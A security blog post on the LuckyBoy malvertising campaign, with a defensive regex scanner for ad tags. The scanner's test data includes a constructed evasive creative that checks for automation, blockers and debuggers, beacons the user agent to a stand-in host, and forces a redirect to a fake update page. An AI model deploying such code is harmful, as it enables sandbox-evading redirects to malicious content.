'Luckyboy' Malvertising campaign hits iOS, Android, Xbox users

Executive Summary:

  1. The LuckyBoy malvertising campaign has penetrated 10 Demand Side Platforms (DSPs, the platforms through which advertisers buy ad inventory from publishers), mostly in Europe but with confirmed cases in the US and Canada.
  2. Security vendor The Media Trust has said that the malware checks for the presence of ad blockers, testing environments (such as being loaded inside a virtual machine) and active debuggers, and will not execute if any are found.
  3. The operators behind LuckyBoy are being exceptionally careful to avoid being caught running this type of malvertising, which points to a team well versed in this kind of campaign.



Should it run on a target environment, the malware fires a tracking pixel programmed to redirect the user to malicious content, including phishing pages and fake software updates.
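The environment checks in the summary above (blocker, virtual machine, debugger) and the pixel-then-redirect flow described here are all visible in an unobfuscated creative, so an ad-quality or security team can triage tags for them before they are served. The script below is an added example written for this post; it is not code from The Media Trust or from the LuckyBoy creative, the two sample creatives are constructed for illustration, and the indicator list, weights and threshold are assumptions to be tuned against real tags.

```javascript
// Heuristic triage of ad-tag JavaScript for sandbox-evasion and forced-redirect
// patterns. Regex-based, so it only catches unobfuscated creatives: treat hits as
// leads for manual review, not as verdicts. (Added example; indicator weights and
// the threshold are assumptions, not values from the campaign write-up.)

const INDICATORS = [
  // Automation / headless-browser detection
  { id: "webdriver-flag", weight: 3, test: (s) => /navigator\.webdriver/.test(s) },
  { id: "headless-ua", weight: 3, test: (s) => /HeadlessChrome|PhantomJS/i.test(s) },
  // Debugger detection: a `debugger` statement timed against a clock
  { id: "debugger-timing", weight: 4,
    test: (s) => /\bdebugger\b/.test(s) && /(performance\.now|Date\.now|new Date)\s*\(/.test(s) },
  // DevTools-open heuristic based on window chrome size
  { id: "devtools-size", weight: 2,
    test: (s) => /outerWidth\s*-\s*innerWidth|outerHeight\s*-\s*innerHeight/.test(s) },
  // Ad-blocker bait element whose collapsed size reveals a blocker
  { id: "adblock-bait", weight: 3,
    test: (s) => /adsbox|ad-banner|adBanner/.test(s) && /offsetHeight|offsetWidth/.test(s) },
  // VM / software-renderer fingerprinting via WebGL
  { id: "vm-renderer", weight: 3,
    test: (s) => /UNMASKED_RENDERER_WEBGL|WEBGL_debug_renderer_info/.test(s) &&
                 /SwiftShader|llvmpipe|VirtualBox|VMware/i.test(s) },
  // Forced navigation out of the ad frame
  { id: "forced-redirect", weight: 4,
    test: (s) => /(top|parent)\.location|location\.replace\s*\(|location\.href\s*=/.test(s) },
  // Image beacon carrying collected data (weak on its own; viewability code uses it too)
  { id: "image-beacon", weight: 1,
    test: (s) => /new\s+Image\s*\(\s*\)/.test(s) && /encodeURIComponent/.test(s) },
];

const SUSPICIOUS_THRESHOLD = 6; // assumption: two strong indicators, or one plus context

function scanCreative(source) {
  const matched = INDICATORS.filter((i) => i.test(source));
  const hits = matched.map((i) => i.id);
  const score = matched.reduce((acc, i) => acc + i.weight, 0);
  return { hits, score, suspicious: score >= SUSPICIOUS_THRESHOLD };
}

// Constructed sample creatives (not real ad tags).
const BENIGN_CREATIVE = `
  var img = document.createElement('img');
  img.src = 'https://cdn.example/creative.png';
  img.onload = function () { new Image().src = '/viewed?id=' + encodeURIComponent('c1'); };
  document.getElementById('ad').appendChild(img);
`;

const EVASIVE_CREATIVE = `
  (function () {
    if (navigator.webdriver) return;                      // automation present
    var bait = document.createElement('div'); bait.className = 'adsbox';
    document.body.appendChild(bait);
    if (bait.offsetHeight === 0) return;                  // blocker collapsed the bait
    var t0 = performance.now(); debugger;
    if (performance.now() - t0 > 100) return;             // debugger attached
    var px = new Image();                                 // tracking pixel
    px.src = 'https://example.invalid/p.gif?ua=' + encodeURIComponent(navigator.userAgent);
    px.onload = function () { top.location = 'https://example.invalid/update'; };
  })();
`;

for (const [name, src] of Object.entries({ benign: BENIGN_CREATIVE, evasive: EVASIVE_CREATIVE })) {
  console.log(name, JSON.stringify(scanCreative(src)));
}
```

Run it with `node scan.js`; the benign creative scores only the weak image-beacon indicator, while the evasive one trips the webdriver, bait-element, debugger-timing and forced-redirect checks. Real campaigns of this kind tend to be packed or obfuscated, so in practice this static pass is paired with instrumented execution in a browser that does not look like a sandbox.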

It is not uncommon for Android applications to carry malicious adverts that are injected only after Google's automated vetting process has given the green light. Google has, however, made significant progress over the last year in removing applications that break its rules (typically paid lookalikes of popular apps with similar functions, or simply fake apps designed to look legitimate).



“LuckyBoy is likely executing tests, probing to gauge their success before launching a broader attack. Campaign was confirmed to execute on tags wrapped with malware blocking code, bypassing these defenses as further evidence that its sophistication is impressive,” The Media Trust notes in a report shared with SecurityWeek.

It is notable in the current threat landscape that an attacker like this tries to hide from detection, and more impressive still that it also hides from non-target environments. Whether it removes itself from a non-target system remains to be seen.


Closing thoughts

Notable in this case is the sophisticated use of tracking pixels [1]. This could be an attempt to decide who a target of interest may be before executing the payload; who that applies to remains to be seen. It will be interesting to see who the targets are, and how the evasion techniques adjust to keep detection probabilities low within target systems. There is also very little users can do to combat the malvertising, as the publisher will serve the advertising to whoever its data shows it is relevant to, possibly limiting the targets available in some way. I expect affected devices will require patching; however, it should be on the penetrated DSP providers to resolve any issues.






[1]: Marketing pixels, aka tracking pixels, are tiny snippets of code (typically a request for a 1x1 image) that let a site gather information about its visitors: how they browse, which ads they click on, and so on. Marketers use this behaviour data to serve users the paid ads most likely to interest them.





